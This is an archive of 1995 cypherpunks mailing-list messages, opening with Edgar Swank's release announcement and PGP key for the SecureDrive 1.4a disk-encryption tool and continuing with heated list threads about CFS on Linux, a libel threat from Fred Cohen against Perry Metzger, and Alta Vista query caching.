1.4a fixes a problem decrypting or activating a diskette or disk
partition encrypted with both a passphrase and a keyfile.

There are also some minor changes in SECDRV.DOC.

In the USA, SecureDrive 1.4a is not available at

    Colorado Catacombs BBS - 303-772-1062 (up to 28,800 bps, 8n1) -
    log in with your own name or alias.  Download SECDR14A.ZIP from
    the [F]ile menu.

    see ftp://ftp.csn.net/mpj/README for the ???????  in
    ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/disk/secdr14a.zip

    See ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS for access to
    ftp://miyako.dorm.duke.edu/mpj/crypto/link/mpj/disk/secdr14a.zip

These are all controlled-access sites available to USA citizens and
residents only.

Thanks to the cooperation of Steve Crompton of the U.K., who worked
with me closely, I am able to also announce availability on an
offshore site,

  ftp://utopia.hacktic.nl/pub/replay/pub/incoming/SECDR14A.ZIP

If you perchance don't find it there try directories

    /pub/replay/pub/crypto/CRYPTOapps
    /pub/replay/pub/disk

which currently contains previous versions of SecureDrive. But as I
write, SECDR14A.ZIP has been left in the incoming directory for
several days.

Steve also uploaded 1.4a to

    ftp.ox.ac.uk/incoming

But it has been removed from there and has (so far) not reappeared
elsewhere. But previous versions are in directory

    pub/crypto/misc

so it might be worth checking there from time to time.

In case anyone in the U.S. Justice Dept. is reading this, Steve and I
were very careful to do this release without violating US export
restrictions. The only things I "exported" to Steve were "diffs" for
source changes from 1.4 to 1.4a, which themselves don't contain any
code capable of encryption or decryption. Steve combined those with
source for 1.4, which "leaked" from the US sites where I released it
months ago.

Steve compiled the new source code, and sent the new EXE files to me.
I compared the new executables to ones I compiled myself and verified
they match, bit for bit.  I then sent back to Steve detached signature
files for the executables.  Steve then put together SECDR14A.ZIP and
sent that to me for final inspection.  I then compared all files
against my "master" files here and verified that they matched. I then
shipped the SECDR14A.ZIP that Steve sent me to the USA sites. So the
USA release matches bit for bit the offshore release.

Here are the contents of SECDR14A.ZIP

 Length  Method   Size  Ratio   Date    Time    CRC-32  Attr  Name
 ------  ------   ----- -----   ----    ----   -------- ----  ----
  18321  DeflatN   6923  63%  06-14-93  22:27  0767480b --w-  COPYING
   2022  DeflatN    789  61%  08-06-95  00:00  dd3e9e64 --w-  COPYSECT.C
  12542  DeflatN   7674  39%  08-06-95  00:00  c089888f --w-  COPYSECT.EXE
    152  Stored     152   0%  08-06-95  00:00  17b02bc2 --w-  COPYSECT.SIG
  19664  DeflatN   4241  79%  11-19-93  21:42  22c2502c --w-  CRYPT2.ASM
  19625  DeflatN   4618  77%  11-10-95  16:11  3a6b64fe --w-  CRYPTDSK.C
  41898  DeflatN  19879  53%  11-14-95  18:59  26bc0200 --w-  CRYPTDSK.EXE
   4353  DeflatN   1723  61%  08-06-95  00:00  b4e99e6a --w-  FPART.C
  15450  DeflatN   9794  37%  08-06-95  00:00  44c4a0e7 --w-  FPART.EXE
    152  Stored     152   0%  08-06-95  00:00  0b345a16 --w-  FPART.SIG
   5278  DeflatN   3468  35%  11-14-95  20:52  af2f141c --w-  KEY.ASC
  18450  DeflatN   4541  76%  11-10-95  16:13  c5ad8fa4 --w-  LOGIN.C
  43558  DeflatN  20297  54%  11-14-95  18:59  cfd0bd3b --w-  LOGIN.EXE
    278  DeflatN    250  11%  12-06-95  20:33  6c13428c --w-  FILE_ID.DIZ
   1554  DeflatN    568  64%  08-06-95  00:00  3589f489 --w-  MAKEFILE
  11557  DeflatN   3315  72%  05-09-93  19:38  e71f3eea --w-  MD5.C
   3407  DeflatN   1104  68%  05-11-93  12:49  f1f58517 --w-  MD5.H
   1355  DeflatN    629  54%  01-21-94  08:44  db63ade4 --w-  RLDBIOS.ASM
  14819  DeflatN   4087  73%  11-14-95  18:56  592274c6 --w-  SDCOMMON.C
  52551  DeflatN  19113  64%  12-06-95  15:33  cf5e3ded --w-  SECDRV.DOC
   3656  DeflatN   1098  70%  08-06-95  00:00  6ed75bcc --w-  SECDRV.H
  32595  DeflatN   8906  73%  08-06-95  00:00  1c7d2225 --w-  SECTSR.ASM
   2000  DeflatN   1326  34%  08-06-95  00:00  ba1568d1 --w-  SECTSR.COM
    152  Stored     152   0%  08-06-95  00:00  3817512c --w-  SECTSR.SIG
  11519  DeflatN   2864  76%  08-06-95  00:00  060d33e8 --w-  SETENV.ASM
   1254  DeflatN    541  57%  05-09-93  19:39  182978aa --w-  USUALS.H
    152  Stored     152   0%  12-06-95  17:05  2d1c5fc9 --w-  CRYPTDSK.SIG
    152  Stored     152   0%  12-06-95  17:10  8dae8ad5 --w-  LOGIN.SIG
 ------          ------  ---                                  -------
 338466          128508  63%                                       28

Also note that the ZIP file contains PGP detached signatures (*.SIG)
for the executable files.  Finally here is my public key, also
available on many public keyservers; note who has signed it. Also
please note my present Email address.

Edgar Swank   <edgar@Garg.Campbell.CA.US>

(Only Garg ID is now valid)
Type bits/keyID    Date        User ID
pub  1024/DA87C0C7 1992/10/17  Edgar Swank   <edgar@Garg.Campbell.CA.US>
sig       32DD98D9               Vesselin V. Bontchev <bontchev@complex.is>
sig       0F59323D               Albert Yee <sa3189049@ntuvax.ntu.ac.sg>
sig       DA87C0C7               Edgar Swank   <edgar@Garg.Campbell.CA.US>
                               Edgar W. Swank <edgar@spectrx.sbay.org>
sig       91E71221               Cruz <cruz@ccxbbs.uunet.ve>
sig       DA87C0C7               Edgar Swank   <edgar@Garg.Campbell.CA.US>
sig       C0595F91               Ian H. Chan <ianchan@iti.gov.sg>
sig       61130A1B               Arnold L. Cornez, J.D. <arniec@dnai.com>
sig       18239E91               Robert C.Casas <73763.20@compuserve.com>
sig       4AAF00E5               Dave Del Torto <ddt@lsd.com>
sig       08B707C5               Anton Sherwood <dasher@netcom.com>
sig       32DD98D9               Vesselin V. Bontchev <bontchev@complex.is>
sig       34D74DC1               Peter Simons <simons@peti.rhein.de>
                               Edgar W. Swank <edgar@spectrx.saigon.com>
sig       08B707C5               Anton Sherwood <dasher@netcom.com>
sig       32DD98D9               Vesselin V. Bontchev <bontchev@complex.is>
sig       FF67F70B               Philip R. Zimmermann <prz@sage.cgd.ucar.edu>
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

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
7n/03ld56wWGttc2sw==
=n5hN
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNszct4nNf3ah8DHAQHBGQQAhbb0ZCJ3iiB096HxJac33XFTxG/GwNB4
4nWN5/I2s8Cve/USUGVC9YIHKV7NHkHn0Pybo727w46am6DMLoQTdnPzR2O+C+TY
mozxnwDYfznzWCzjqadHOsPRK9/ix8aB2ThfGsNaAvOgVjvnDg/uG8ztLwW/G1Hv
L/zVBh8nIs0=
=YArx
-----END PGP SIGNATURE-----

-- 
edgar@Garg.Campbell.CA.US (Edgar Swank)
The Land of Garg BBS -- +1 408 378-5108




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 24 Dec 1995 03:09:06 +0800
To: cypherpunks@toad.com
Subject: Re: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE??
Message-ID: <199512231817.KAA24182@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Dec 1995, Perry E. Metzger wrote:

> anonymous-remailer@shell.portal.com writes:
> > Everyone should ask this question.  AT&T can sign-on to a two-page ad,
> > calling on Congress to balance the budget -- to cut off veterans, and
> > cut-off women with dependent children just before Christmas.  It can
> > sign on to this, but it can't bother to even offer a scholarship to
> > the students who helped make its fortunes.  It would rather leave the
> > impression that it freeloads off of other's efforts.
> 
> God, you are annoying Fred, ER, I meant, "Alice".

My dearest Perry. 

I am not Fred.  I am not he.  He is not me. Got it??  We aren't even in
the same category or the same country.  Fred's an American, and I am not. 

Scary, isn't it??  A non-American ...

Oh ... and a Happy Ho Ho to ya, Perry.  My own best wishes. (just in case 
you didn't get my email, which wished the same, I mean).

And _none_ of this changes the fact that AT&T and Netscape are my 
personal nominees for the "Christmas Net Scrooge" award.  

Anyone willing to second, that??



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 24 Dec 1995 01:03:40 +0800
To: cypherpunks@toad.com
Subject: Re: CFS and Linux (fwd)
Message-ID: <199512231633.KAA04297@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: CFS and Linux 
> Date: Sat, 23 Dec 1995 11:15:40 -0500
> From: "Perry E. Metzger" <perry@piermont.com>
> 
> Alice B. Cohen writes:
> anonymous-remailer@shell.portal.com writes:
> > >  1: please make it install 'out-of-the-box' on Linux.
> > 
> > AT&T's refusal to support CFS and other so-called "secure" software
> > under Linux is typical and to be expected.
> 
> God, you are an obnoxious prick.
> 

Ditto.

> First of all, this is Matt Blaze's pet project, not a product of
> AT&T. It is given away for free and you should be happy to get it at
> all -- no one is obligated to give you a gift. Have you mailed him a
> Linux machine to do his testing on? Why do you assume he even has one?
> As it happens, he doesn't, and probably doesn't want to go through the
> hassle of paying for a computer and putting Linux on it.
> 
> Be happy he's given you anything at all.
> 
> Perry
> 

If you are going to do it, do it right the first time.

Second, I really doubt Blaze has a problem obtaining access to computing
power and a $25 CD should be within his budget.

Merry Christmas.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sun, 24 Dec 1995 03:47:48 +0800
To: perry@piermont.com (Perry E. Metzger)
Subject: Re: Fred Cohen: Re: CFS and Linux
In-Reply-To: <199512231823.NAA07160@jekyll.piermont.com>
Message-ID: <199512231904.LAA00483@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
> I thought people would love to see this.
> 
> Note especially "Dr." Fred's threat to have toad.com confiscated as
> part of a conspiracy against his reputation.

I'm sure a number of people, myself included, would be willing
to host the CP list should "Dr" Fred make good his threat.

I'd even be willing to testify in court as to the nature of
Fred's reputation.  I'm sure the operator of the Firewalls list
would be too.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Sun, 24 Dec 1995 07:44:11 +0800
To: aba@atlas.ex.ac.uk
Subject: Re: PGP timeline FAQ... comments requested
In-Reply-To: <297.9512221337@exe.dcs.exeter.ac.uk>
Message-ID: <2QF3w8m9LgHf085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Not to belittle something that is the obvious result of painstaking work;
but I think the timeline FAQ can be improved in two general ways:

(1)  More of the specific events should be specifically dated; and

(2)  I think it would be appropriate to include a version history of PGP.  
Among other things, I think it appropriate to note the distinction between
PRZ's own Bass-o-matic conventional encryption in the earliest versions and
the use of IDEA in later versions.

These comments aside, you've done an excellent job, and the facts you present
jibe well with my own understanding.

- -- 
   Alan Bostick             | SWINDON:   What will history say?
Seeking opportunity to      | BURGOYNE:  History, sir, will tell lies as usual.
develop multimedia content. |    George Bernard Shaw, THE DEVIL'S DISCIPLE
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMNxVXeVevBgtmhnpAQHJ1QMAmkcQCxoXN5RW4TaviA6yN8BG4aKF2kHh
98/+2WJDrht15SBNna7M1cclT3k0nb4bY2gTIQpCi080vw6tZVhYMRs+lvBjgbLm
7lGyDvdAzAr6azliI6DKwrL7n8aflRiB
=dPNR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 24 Dec 1995 00:50:42 +0800
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
In-Reply-To: <199512230317.TAA19444@jobe.shell.portal.com>
Message-ID: <199512231615.LAA06929@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Alice B. Cohen writes:
anonymous-remailer@shell.portal.com writes:
> >  1: please make it install 'out-of-the-box' on Linux.
> 
> AT&T's refusal to support CFS and other so-called "secure" software
> under Linux is typical and to be expected.

God, you are an obnoxious prick.

First of all, this is Matt Blaze's pet project, not a product of
AT&T. It is given away for free and you should be happy to get it at
all -- no one is obligated to give you a gift. Have you mailed him a
Linux machine to do his testing on? Why do you assume he even has one?
As it happens, he doesn't, and probably doesn't want to go through the
hassle of paying for a computer and putting Linux on it.

Be happy he's given you anything at all.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 24 Dec 1995 01:14:26 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: CFS and Linux (fwd)
In-Reply-To: <199512231633.KAA04297@einstein>
Message-ID: <199512231640.LAA07020@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate writes:
> 
> > First of all, this is Matt Blaze's pet project, not a product of
> > AT&T. It is given away for free and you should be happy to get it at
> > all -- no one is obligated to give you a gift. Have you mailed him a
> > Linux machine to do his testing on? Why do you assume he even has one?
> > As it happens, he doesn't, and probably doesn't want to go through the
> > hassle of paying for a computer and putting Linux on it.
> > 
> > Be happy he's given you anything at all.
> 
> If you are going to do it, do it right the first time.
> 
> Second, I really doubt Blaze has a problem obtaining access to computing
> power and a $25 CD should be within his budget.

Setting up and doing work on a new operating system is *WORK*. It
takes time. It takes space in your lab or office. Maybe he just
doesn't feel like spending that time, effort, and lab budget. Why
should he? CFS is a GIFT. It isn't a product. Maybe if you paid
someone to maintain a Linux version you would have one, but you aren't
paying a penny. Quit looking a gift horse in the mouth.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 24 Dec 1995 01:48:31 +0800
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
In-Reply-To: <9512231705.AA21041@all.net>
Message-ID: <199512231733.MAA07103@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Fred Cohen writes to me in private:
> > Alice B. Cohen writes:
> 
> If you mean to imply that I am Alice, that constitutes slander, and I
> will sue.

I'd love to see you try. Please, sue me immediately.

Since you agree in public with Alice practically all the time, the
damages would be fascinating to assess. "Your honor, my client, who
has no reputation in the group we are discussing to speak of, feels
that by being publically conflated with this anonymous personage who's
opinions he univerasally agrees with that his reputation has been
damaged, since, well, er, we aren't sure why, but it has. I mean,
people might ascribe opinions to him that he claims to hold! Obviously
that must be damaging!"

What would the monetary damages be, Fred? I mean, there are some
people here who would gain a bit of added respect for you since being
Alice would imply that you knew how to use anonymous remailers, so
there would be some evidence that you could do *something*, which many
people here had in doubt up until now. I suspect you actually gain
reputation that way, so perhaps I should sue you for unjust
enrichment. (*)

Perry

(* Not close captioned for the sarcasm impaired.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steve@miranova.com (Steven L. Baur)
Date: Sun, 24 Dec 1995 05:05:38 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Alta Vista caches queries
In-Reply-To: <199512220220.DAA27203@utopia.hacktic.nl>
Message-ID: <m2hgyr5x07.fsf_-_@diana.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Hieronymous" == Anonymous  <nobody@REPLAY.COM> writes:

    Hieronymous> Here's one more
    Hieronymous> reason to worry about the implications of web search
    Hieronymous> engines: I just stopped in on Digital's new Alta
    Hieronymous> Vista page, and was surprised to find that the query
    Hieronymous> field was filled in--with a search I ran 3 or 4 days
    Hieronymous> ago.

I see no evidence whatsoever that caching is taking place.  The
Alta Vista robot browsed the web site I manage for months prior to
public release, and behaved in exemplary fashion.  In short, they
appear to be managed by people who know what they're doing.  There's
nothing sinister about Alta Vista IMHO.

Furthermore, no one has mentioned the positive changes made to
Dejanews since it got bashed thoroughly on this list a few weeks ago.
They've significantly turned down the amount of old information
indexed, and have restricted the groups (and mailing lists) they
archive.

-- 
steve@miranova.com baur




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 24 Dec 1995 04:27:54 +0800
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
In-Reply-To: <199512231615.LAA06929@jekyll.piermont.com>
Message-ID: <LFRkgD11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:
> Alice B. Cohen writes:
> anonymous-remailer@shell.portal.com writes:
> > >  1: please make it install 'out-of-the-box' on Linux.

I have the impression that the vast majority of free Unix stuff, even
systems-related, runs well under Linux. Some program have problems with flavors
of Unix. E.g., I remember how much trouble it was to get pcomm to run under
SunOS. I see nothing at all "obnoxious" about this polite request to fix CFS. I
see tons of polite requests to fix free stuff on Usenet.

> > AT&T's refusal to support CFS and other so-called "secure" software
> > under Linux is typical and to be expected.
>
> God, you are an obnoxious prick.
>
> First of all, this is Matt Blaze's pet project, not a product of
> AT&T. It is given away for free and you should be happy to get it at
> all -- no one is obligated to give you a gift. Have you mailed him a
> Linux machine to do his testing on? Why do you assume he even has one?
> As it happens, he doesn't, and probably doesn't want to go through the
> hassle of paying for a computer and putting Linux on it.

Perry, one doesn't need to mail someone a Linux machine, or pay for a new
computer. One can install it easily in a partition on a non-dedicated PC
running Windows, and boot it and MS DOS alternatively. I got the latest Linux
CD from $12 from Morse Communications. Or, one can download Linux. Most people
have an Intel box somewhere. Linux is free, and comes with source code.

Everyone I know who writes code serously has at least tried Linux. No everyone
uses it for serious work, but everyone at least played with it. Not having even
tried suggests (to me) a regrettable lack of intellectual curiosity.

After using both Linux and SCO Unix Extensively on Intel boxes, I can attest
that Linux is much less buggy and better supported (via Usenet) than SCO.

(*Unix is no longer a trademark of AT&T Bell Labs)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 24 Dec 1995 03:14:20 +0800
To: cypherpunks@toad.com
Subject: Fred Cohen: Re: CFS and Linux
Message-ID: <199512231823.NAA07160@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I thought people would love to see this.

Note especially "Dr." Fred's threat to have toad.com confiscated as
part of a conspiracy against his reputation.

Perry

------- Forwarded Message

From: fc@all.net (Fred Cohen)
Message-Id: <9512231757.AA22460@all.net>
Subject: Re: CFS and Linux
To: perry@piermont.com
Date: Sat, 23 Dec 1995 12:57:40 -0500 (EST)
In-Reply-To: <199512231733.MAA07103@jekyll.piermont.com> from "Perry E. Metzger" at Dec 23, 95 12:33:15 pm
X-Mailer: ELM [version 2.4 PL22]
Content-Type: text
X-UIDL: 819742624.003

> Fred Cohen writes to me in private:
> > > Alice B. Cohen writes:
> > 
> > If you mean to imply that I am Alice, that constitutes slander, and I
> > will sue.
> 
> I'd love to see you try. Please, sue me immediately.
> 
> Since you agree in public with Alice practically all the time, the
> damages would be fascinating to assess. "Your honor, my client, who
> has no reputation in the group we are discussing to speak of, feels
> that by being publically conflated with this anonymous personage who's
> opinions he univerasally agrees with that his reputation has been
> damaged, since, well, er, we aren't sure why, but it has. I mean,
> people might ascribe opinions to him that he claims to hold! Obviously
> that must be damaging!"

To the contrary, I have a very good global reputation, and you are
knowingly and maliciously attempting to slander me by claiming that
I use a false identity to support my positions.

> What would the monetary damages be, Fred? I mean, there are some
> people here who would gain a bit of added respect for you since being
> Alice would imply that you knew how to use anonymous remailers, so
> there would be some evidence that you could do *something*, which many
> people here had in doubt up until now. I suspect you actually gain
> reputation that way, so perhaps I should sue you for unjust
> enrichment. (*)

Let's see.  I guess I would start by having the police confiscate the
toad.com computers becfause thay are part of a criminal conspiracy to
daamage my reputation.  Criminal because of the recent changes in the
law that prohibit you from sending me information I don't want to get.

The dollar value would be $1 plus a public apology plus all costs of the
suit plus my time to right the wrong (at my usual fee of course).  Of
course the fact that you have decided to make this posting in public
justifies my extensive efforts to clear my reputation which, unless you
apologize immediately will be surprisingly enjoyable for me.

- -> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 24 Dec 1995 03:13:10 +0800
To: fc@all.net (Fred Cohen)
Subject: Re: CFS and Linux
In-Reply-To: <9512231757.AA22460@all.net>
Message-ID: <199512231833.NAA07171@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Fred Cohen writes:
> The dollar value would be $1 plus a public apology plus all costs of the
> suit plus my time to right the wrong (at my usual fee of course).  Of
> course the fact that you have decided to make this posting in public
> justifies my extensive efforts to clear my reputation which, unless you
> apologize immediately will be surprisingly enjoyable for me.

Go and sue, Fred. Its what I have lawyers for. If you can even find an
attorney willing to take your "case", mine will likely remind yours
that lawyers can now be punished by the court in many jurisdictions
for knowingly aiding in bringing frivolous suits. If you are seeking
$1 in damages the court is especially likely to consider the whole
thing a waste of time.

I think you will find that I'm very, very hard to intimidate. Don't
bother "giving me a second chance" or any such stuff. Either find a
lawyer stupid enough to risk his license by taking this case and let
me know you are suing me by sending over a process server, or quit
bothering me.

> Let's see.  I guess I would start by having the police confiscate the
> toad.com computers becfause thay are part of a criminal conspiracy to
> daamage my reputation.  Criminal because of the recent changes in the
> law that prohibit you from sending me information I don't want to get.

I think you will find that John Gilmore is even more difficult to
intimidate than I am.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 24 Dec 1995 03:32:38 +0800
To: cypherpunks@toad.com
Subject: Fred Cohen: Re: CFS and Linux
Message-ID: <199512231845.NAA07203@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



More Fun from Fred. For those that haven't been following, he
threatened to sue me for quoting an Alice post as "Alice B. Cohen",
and threatened to have his attorneys seize the machines the
cypherpunks mailing lists run on for being part of a "criminal
conspiracy" against him.

Perry

------- Forwarded Message

From: fc@all.net (Fred Cohen)
Message-Id: <9512231834.AA23326@all.net>
Subject: Re: CFS and Linux
To: perry@piermont.com
Date: Sat, 23 Dec 1995 13:34:49 -0500 (EST)
